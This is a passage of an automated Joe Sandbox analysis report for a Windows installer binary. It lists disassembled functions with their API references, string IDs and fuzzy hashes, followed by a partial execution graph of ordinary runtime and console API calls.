                        • Opcode Fuzzy Hash: ab176a573855c22d01f36f7e839ea78fcf500f84f40be29ceb791267b68f1117
                        • Instruction Fuzzy Hash: 9D71A43DD05256DBDB308F55C888AEEB6B9BF45328F184316EA2067A80DB7588C6C770
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: @$hfJ
                        • API String ID: 3519838083-1391159562
                        • Opcode ID: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                        • Instruction ID: 36e0ec98f84a90bfba43d6babcf1c9e0997c187d39179a477182aceff1286741
                        • Opcode Fuzzy Hash: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                        • Instruction Fuzzy Hash: 28913970A20219DFCB10DFA9C9809EEFBF4FF19308F54451EE556A7A90D770AA88CB11
                        APIs
                        • __EH_prolog.LIBCMT ref: 6CAB6C5D
                          • Part of subcall function 6CAB561A: __EH_prolog.LIBCMT ref: 6CAB561F
                          • Part of subcall function 6CAB5A2E: __EH_prolog.LIBCMT ref: 6CAB5A33
                          • Part of subcall function 6CAB6EA5: __EH_prolog.LIBCMT ref: 6CAB6EAA
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: WZJ
                        • API String ID: 3519838083-1089469559
                        • Opcode ID: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                        • Instruction ID: 143c9ddb59297f52e5a4f5a3b0acd03543b9cac88531b9378b663d2f0c5fae8d
                        • Opcode Fuzzy Hash: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                        • Instruction Fuzzy Hash: 1B813A31D00159DFCF15DFA8DA91ADDBBB4AF09308F14409AE416B77A0DB30AE89CB61
                        APIs
                        • ___std_exception_destroy.LIBVCRUNTIME ref: 6C932A76
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: ___std_exception_destroy
                        • String ID: Jbx$Jbx
                        • API String ID: 4194217158-1161259238
                        • Opcode ID: 4084fb03b19df9d268515f89dbb967c0ef4b516da9eca22a3b28ed15612e4972
                        • Instruction ID: 656b7d2dfd320de516b23b0dde53a27ac4683b37cbfa13db14cab4b8200e2c4b
                        • Opcode Fuzzy Hash: 4084fb03b19df9d268515f89dbb967c0ef4b516da9eca22a3b28ed15612e4972
                        • Instruction Fuzzy Hash: 935125B19002148FCB14CF59D9846AEBBB5FF89304F14856EE849DBB42E331E989CBD1
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: <dJ$Q
                        • API String ID: 3519838083-2252229148
                        • Opcode ID: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                        • Instruction ID: fac57a84f4d4c69c6e3dcf2682ff2e5883cd002214f97153b608177a8dbbbb95
                        • Opcode Fuzzy Hash: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                        • Instruction Fuzzy Hash: 1A519C7091421AEFCF00DFA8D8808EDB7B5FF49308F24856EE515BBA50D7319A89CB91
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: $D^J
                        • API String ID: 3519838083-3977321784
                        • Opcode ID: 592ff2149492c1b5d1f5267e2a791cd36de2b3efa6476b1a9cfe308cba17f1e8
                        • Instruction ID: 08fd07db964c0e8b54c6a715ee589b437b82e6b6ae67bb36c05d712879a6b635
                        • Opcode Fuzzy Hash: 592ff2149492c1b5d1f5267e2a791cd36de2b3efa6476b1a9cfe308cba17f1e8
                        • Instruction Fuzzy Hash: 7A414A20A155946EDB22AA3887907ECBBFD9F36208F1C815CC496A7E91DB7459CFC390
                        APIs
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,6CA834F6), ref: 6CA7BE3B
                        • __dosmaperr.LIBCMT ref: 6CA7BE42
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: ErrorLast__dosmaperr
                        • String ID: 8Q
                        • API String ID: 1659562826-4022487301
                        • Opcode ID: 7cc58f63c5f8b5a3ed097df8095bc0d1e6de3f7a52734ccdce6df0e5c9a7b87e
                        • Instruction ID: e036a79dce14c5bbdfb3e0a62698eae9be0ff42297c9f0bf70abdfe30494caa5
                        • Opcode Fuzzy Hash: 7cc58f63c5f8b5a3ed097df8095bc0d1e6de3f7a52734ccdce6df0e5c9a7b87e
                        • Instruction Fuzzy Hash: 1941A8B9604154AFDB318F29D990AA97FF5FF46388F284398E9808B742D7319C9587B0
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: X&L$p|J
                        • API String ID: 3519838083-2944591232
                        • Opcode ID: 9119c1f64bb26ad996fbea7536e901d29dd4483baa18a121855aa129662547ca
                        • Instruction ID: 928d3de34171e2dbc92f339f54fae6af125c3e2576f773ae10c11d58c5fc5d4c
                        • Opcode Fuzzy Hash: 9119c1f64bb26ad996fbea7536e901d29dd4483baa18a121855aa129662547ca
                        • Instruction Fuzzy Hash: 44314E31E47105CBDB108B5CDE02BBD77B1EB22718F160126E691E3EA0CB60B9C9CB51
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: 0|J$`)L
                        • API String ID: 3519838083-117937767
                        • Opcode ID: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                        • Instruction ID: 8908a87589afe1f9639e49a3c0cc2382ebda6ca0025178a89452f5e81892c422
                        • Opcode Fuzzy Hash: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                        • Instruction Fuzzy Hash: 9941B031601741DFCF118F60C5947EABBE2FF45208F04452EE09A9BB10CB316889DB51
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: __aulldiv
                        • String ID: 3333
                        • API String ID: 3732870572-2924271548
                        • Opcode ID: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                        • Instruction ID: c4c3016b60a7397b879ae97c32186e10fc183757099d9e9f3851480ec90c409c
                        • Opcode Fuzzy Hash: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                        • Instruction Fuzzy Hash: D02195F09007446FD720CFBA8C84B5FBAFDEB44714F54892EA18AD7B40D770A9488B69
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: @$LuJ
                        • API String ID: 3519838083-205571748
                        • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                        • Instruction ID: 7a0592a6a764e9140f818dd55a595f63e4861d936a7565ac09829cc62a9294fb
                        • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                        • Instruction Fuzzy Hash: 26018072E01709DACB10DFE988815AFFBB8FF59304F40842EE569E3A51C3345948CB9A
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: @$xMJ
                        • API String ID: 3519838083-951924499
                        • Opcode ID: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                        • Instruction ID: 7b31bac0002eb6249cb4562694f19ae01bd847810b8a65a09e25efd78fcc8a11
                        • Opcode Fuzzy Hash: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                        • Instruction Fuzzy Hash: 1C115A71A00209EBCB00CFD9C49059EB7B5FF19308B50C42ED429E7A40D3359A46CF95
                        APIs
                        • _free.LIBCMT ref: 6CA7CB69
                        • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,6CA7945A,?,00000004,?,4B42FCB6,?,?,6CA6E5AC,4B42FCB6,?), ref: 6CA7CBA5
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: AllocHeap_free
                        • String ID: 8Q
                        • API String ID: 1080816511-4022487301
                        • Opcode ID: d4768ead4a22125742a39ea6e808828916749456ebf883a5726247f29bc81979
                        • Instruction ID: 7f8f6239d2be328700092e49c1e21dc3e847fb8149e642af8da9181ac23104c7
                        • Opcode Fuzzy Hash: d4768ead4a22125742a39ea6e808828916749456ebf883a5726247f29bc81979
                        • Instruction Fuzzy Hash: 31F0623DB421156ADB313A379C00F9B37A8BFC2ABCB294116F814A7E80DF20D5C581B4
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prologctype
                        • String ID: |zJ
                        • API String ID: 3037903784-3782439380
                        • Opcode ID: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                        • Instruction ID: c69e6a7e9182d5de3029c003cc6aab5a7498407f099464010cf59eed0f072340
                        • Opcode Fuzzy Hash: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                        • Instruction Fuzzy Hash: 71E065B26165209BEB148B49D8007EDF7A4FF54B25F11405FD117A7A41CBB1F8448791
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prologctype
                        • String ID: <oJ
                        • API String ID: 3037903784-2791053824
                        • Opcode ID: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                        • Instruction ID: ff2da1a93c1e27420cb801d45eabef752945eb997bb6a30ce8346eb5a2971e53
                        • Opcode Fuzzy Hash: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                        • Instruction Fuzzy Hash: 58E0ED32B111209FDB149F09D810BEEFBE4FF45718F12001FA025A3B41CBB1A8848B82
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: @ K$DJ$T)K$X/K
                        • API String ID: 0-3815299647
                        • Opcode ID: c2360a40d33ebeca7632374cab2a44736fbf981b028df34ec032509b6de52aa1
                        • Instruction ID: 389f545f5114cb10c704667f115da6395a07b0034986a39f7bee5b6cddca72b2
                        • Opcode Fuzzy Hash: c2360a40d33ebeca7632374cab2a44736fbf981b028df34ec032509b6de52aa1
                        • Instruction Fuzzy Hash: 5591C230A043059BDB06DF64C5507EEB7A2AF4130CF188819E8769FB85DB75A9CEC762
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: D)K$H)K$P)K$T)K
                        • API String ID: 0-2262112463
                        • Opcode ID: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                        • Instruction ID: 4e9eabd15e308d9ddff96703eb63a7ab7b87466a12eb799658c8c3e3360cea6f
                        • Opcode Fuzzy Hash: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                        • Instruction Fuzzy Hash: EB51F43092424A9BDF00CFA4D944AEEB7B1EF1431CF14461AF821A7B81DB7599DECB61

                        Execution Graph

                        Execution Coverage:4%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:0.3%
                        Total number of Nodes:2000
                        Total number of Limit Nodes:61
                        execution_graph 73210 3acefb 73211 3ad0cc 73210->73211 73212 3acf03 73210->73212 73212->73211 73257 3acae9 VariantClear 73212->73257 73214 3acf59 73214->73211 73258 3acae9 VariantClear 73214->73258 73216 3acf71 73216->73211 73259 3acae9 VariantClear 73216->73259 73218 3acf87 73218->73211 73260 3acae9 VariantClear 73218->73260 73220 3acf9d 73220->73211 73261 3acae9 VariantClear 73220->73261 73222 3acfb3 73222->73211 73262 3acae9 VariantClear 73222->73262 73224 3acfc9 73224->73211 73263 384504 malloc _CxxThrowException 73224->73263 73226 3acfdc 73264 382e04 73226->73264 73228 3ad009 73230 3ad07b 73228->73230 73232 3ad080 73228->73232 73233 3ad030 73228->73233 73229 3acfe7 73229->73228 73267 382f88 73229->73267 73286 381e40 free 73230->73286 73283 3a7a0c CharUpperW 73232->73283 73236 382e04 2 API calls 73233->73236 73239 3ad038 73236->73239 73237 3ad0c4 73287 381e40 free 73237->73287 73238 3ad08b 73284 39fdbc 4 API calls 2 library calls 73238->73284 73241 382e04 2 API calls 73239->73241 73243 3ad046 73241->73243 73273 39fdbc 4 API calls 2 library calls 73243->73273 73244 3ad0a7 73246 382fec 3 API calls 73244->73246 73248 3ad0b3 73246->73248 73247 3ad057 73274 382fec 73247->73274 73285 381e40 free 73248->73285 73253 3ad06b 73281 381e40 free 73253->73281 73255 3ad073 73282 381e40 free 73255->73282 73257->73214 73258->73216 73259->73218 73260->73220 73261->73222 73262->73224 73263->73226 73288 381e0c 73264->73288 73268 382f9a 73267->73268 73269 382fbe 73268->73269 73270 381e0c ctype 2 API calls 73268->73270 73269->73228 73269->73269 73271 382fb4 73270->73271 73293 381e40 free 73271->73293 73273->73247 73275 382ff8 73274->73275 73276 382ffc 73274->73276 73280 381e40 free 73275->73280 73276->73275 73277 381e0c ctype 2 API calls 73276->73277 73278 383010 73277->73278 73294 381e40 free 73278->73294 73280->73253 73281->73255 73282->73230 73283->73238 73284->73244 73285->73230 73286->73237 73287->73211 73289 381e1c malloc 73288->73289 73290 381e15 73288->73290 73291 381e2a _CxxThrowException 73289->73291 73292 381e3e 73289->73292 73290->73289 73291->73292 73292->73229 73293->73269 73294->73275 73295 38c3bd 73296 38c3db 73295->73296 73297 38c3ca 73295->73297 73297->73296 73299 381e40 free 73297->73299 73299->73296 73300 3b993d 73384 3bb5b1 73300->73384 73303 3b9963 73390 391f33 73303->73390 73306 3b9975 73307 3b99b7 GetStdHandle GetConsoleScreenBufferInfo 73306->73307 73308 3b99ce 73306->73308 73307->73308 73309 381e0c ctype 2 API calls 73308->73309 73310 3b99dc 73309->73310 73511 3a7b48 73310->73511 73312 3b9a29 73540 3bb96d _CxxThrowException 73312->73540 73314 3b9a30 73541 3a7018 8 API calls 2 library calls 73314->73541 73316 3b9a7c 73542 3addb5 6 API calls 2 library calls 73316->73542 73317 3b9a66 _CxxThrowException 73317->73316 73319 3b9aa6 73321 3b9aaa _CxxThrowException 73319->73321 73329 3b9ac0 73319->73329 73320 3b9a37 73320->73316 73320->73317 73321->73329 73322 3b9b3a 73546 381fa0 fputc 73322->73546 73324 3b9bfa _CxxThrowException 73345 3b9be6 73324->73345 73326 3b9b63 fputs 73547 381fa0 fputc 73326->73547 73329->73322 73329->73324 73543 3a7dd7 7 API calls 2 library calls 73329->73543 73544 3bc077 6 API calls 73329->73544 73545 381e40 free 73329->73545 73330 3b9b79 strlen strlen 73332 3b9baa fputs fputc 73330->73332 73333 3b9e25 73330->73333 73332->73345 73555 381fa0 fputc 73333->73555 73335 3b9e2c fputs 73556 381fa0 fputc 73335->73556 73337 3b9f0c 73561 381fa0 fputc 73337->73561 73340 3b9f13 fputs 73562 381fa0 fputc 73340->73562 73342 3bb67d 12 API calls 73342->73345 73344 3b9e42 73344->73337 73377 3b9ee0 fputs 73344->73377 73557 3bb650 fputc fputs fputs fputc 73344->73557 73558 3821d8 fputs 73344->73558 73559 3bbde4 fputc fputs 73344->73559 73345->73332 73345->73333 73345->73342 73349 382e04 2 API calls 73345->73349 73361 3b9d2a fputs 73345->73361 73366 3b9d5f fputs 73345->73366 73367 3831e5 malloc _CxxThrowException free _CxxThrowException 73345->73367 73548 3821d8 fputs 73345->73548 73549 38315e malloc _CxxThrowException free _CxxThrowException 73345->73549 73550 383221 malloc _CxxThrowException free _CxxThrowException 73345->73550 73551 381089 malloc _CxxThrowException free _CxxThrowException 73345->73551 73553 381fa0 fputc 73345->73553 73554 381e40 free 73345->73554 73346 3b9f29 73372 3b9f77 fputs 73346->73372 73379 3b9f9f 73346->73379 73563 3bb650 fputc fputs fputs fputc 73346->73563 73564 3bb5e9 fputc fputs 73346->73564 73565 3bbde4 fputc fputs 73346->73565 73349->73345 73552 3821d8 fputs 73361->73552 73366->73345 73367->73345 73560 381fa0 fputc 73377->73560 73385 3bb5bc fputs 73384->73385 73386 3b994a 73384->73386 73580 381fa0 fputc 73385->73580 73386->73303 73528 381fb3 73386->73528 73388 3bb5d5 73388->73386 73389 3bb5d9 fputs 73388->73389 73389->73386 73391 391f6c 73390->73391 73392 391f4f 73390->73392 73581 3929eb 73391->73581 73623 3a1d73 5 API calls __EH_prolog 73392->73623 73395 391f5e _CxxThrowException 73395->73391 73397 391fa3 73399 391fbc 73397->73399 73402 384fc0 5 API calls 73397->73402 73400 391fda 73399->73400 73403 382fec 3 API calls 73399->73403 73404 392022 wcscmp 73400->73404 73412 392036 73400->73412 73401 391f95 _CxxThrowException 73401->73397 73402->73399 73403->73400 73405 3920af 73404->73405 73404->73412 73625 3a1d73 5 API calls __EH_prolog 73405->73625 73407 3920a9 73626 39393c 6 API calls 2 library calls 73407->73626 73408 3920be _CxxThrowException 73408->73412 73410 3920f4 73627 39393c 6 API calls 2 library calls 73410->73627 73412->73407 73417 39219a 73412->73417 73413 392108 73414 392135 73413->73414 73628 392e04 62 API calls 2 library calls 73413->73628 73421 392159 73414->73421 73629 392e04 62 API calls 2 library calls 73414->73629 73630 3a1d73 5 API calls __EH_prolog 73417->73630 73419 3921a9 _CxxThrowException 73419->73421 73420 39227f 73586 392aa9 73420->73586 73421->73420 73422 392245 73421->73422 73631 3a1d73 5 API calls __EH_prolog 73421->73631 73426 382fec 3 API calls 73422->73426 73429 39225c 73426->73429 73427 3922d9 73431 392302 73427->73431 73432 382fec 3 API calls 73427->73432 73428 392237 _CxxThrowException 73428->73422 73429->73420 73632 3a1d73 5 API calls __EH_prolog 73429->73632 73430 382fec 3 API calls 73430->73427 73604 384fc0 73431->73604 73432->73431 73436 392271 _CxxThrowException 73436->73420 73438 392322 73439 3926c6 73438->73439 73449 3923a1 73438->73449 73440 3928ce 73439->73440 73442 392700 73439->73442 73645 3a1d73 5 API calls __EH_prolog 73439->73645 73441 39293a 73440->73441 73458 3928d5 73440->73458 73443 39293f 73441->73443 73444 3929a5 73441->73444 73646 3932ec 14 API calls 2 library calls 73442->73646 73663 384eec 16 API calls 73443->73663 73450 3929ae _CxxThrowException 73444->73450 73467 39264d 73444->73467 73447 392713 73647 393a29 73447->73647 73454 39247a wcscmp 73449->73454 73474 39248e 73449->73474 73451 3926f2 _CxxThrowException 73451->73442 73453 39294c 73664 384ea1 8 API calls 73453->73664 73457 3924cf wcscmp 73454->73457 73454->73474 73459 3924ef wcscmp 73457->73459 73457->73474 73458->73467 73662 3a1d73 5 API calls __EH_prolog 73458->73662 73463 39250f 73459->73463 73459->73474 73460 392953 73464 384fc0 5 API calls 73460->73464 73636 3a1d73 5 API calls __EH_prolog 73463->73636 73464->73467 73465 392920 _CxxThrowException 73465->73467 73467->73306 73469 39251e _CxxThrowException 73472 39252c 73469->73472 73470 3927cf 73471 392880 73470->73471 73479 39281f 73470->73479 73658 3a1d73 5 API calls __EH_prolog 73470->73658 73476 382fec 3 API calls 73471->73476 73485 39289b 73471->73485 73482 392569 73472->73482 73637 392e04 62 API calls 2 library calls 73472->73637 73473 382fec 3 API calls 73483 3927a9 73473->73483 73474->73472 73633 384eec 16 API calls 73474->73633 73634 384ea1 8 API calls 73474->73634 73635 3a1d73 5 API calls __EH_prolog 73474->73635 73476->73485 73477 3924c1 _CxxThrowException 73477->73457 73479->73471 73486 392847 73479->73486 73659 3a1d73 5 API calls __EH_prolog 73479->73659 73481 39258c 73488 3925a4 73481->73488 73639 392a61 malloc _CxxThrowException free _CxxThrowException memcpy 73481->73639 73482->73481 73638 392e04 62 API calls 2 library calls 73482->73638 73483->73470 73657 383563 memmove 73483->73657 73484 392811 _CxxThrowException 73484->73479 73485->73467 73661 3a1d73 5 API calls __EH_prolog 73485->73661 73486->73471 73660 3a1d73 5 API calls __EH_prolog 73486->73660 73640 384eec 16 API calls 73488->73640 73494 3925ad 73641 3a1b07 49 API calls 73494->73641 73495 3928c0 _CxxThrowException 73495->73440 73496 392839 _CxxThrowException 73496->73486 73499 392872 _CxxThrowException 73499->73471 73500 3925b4 73642 384ea1 8 API calls 73500->73642 73502 3925bb 73503 382fec 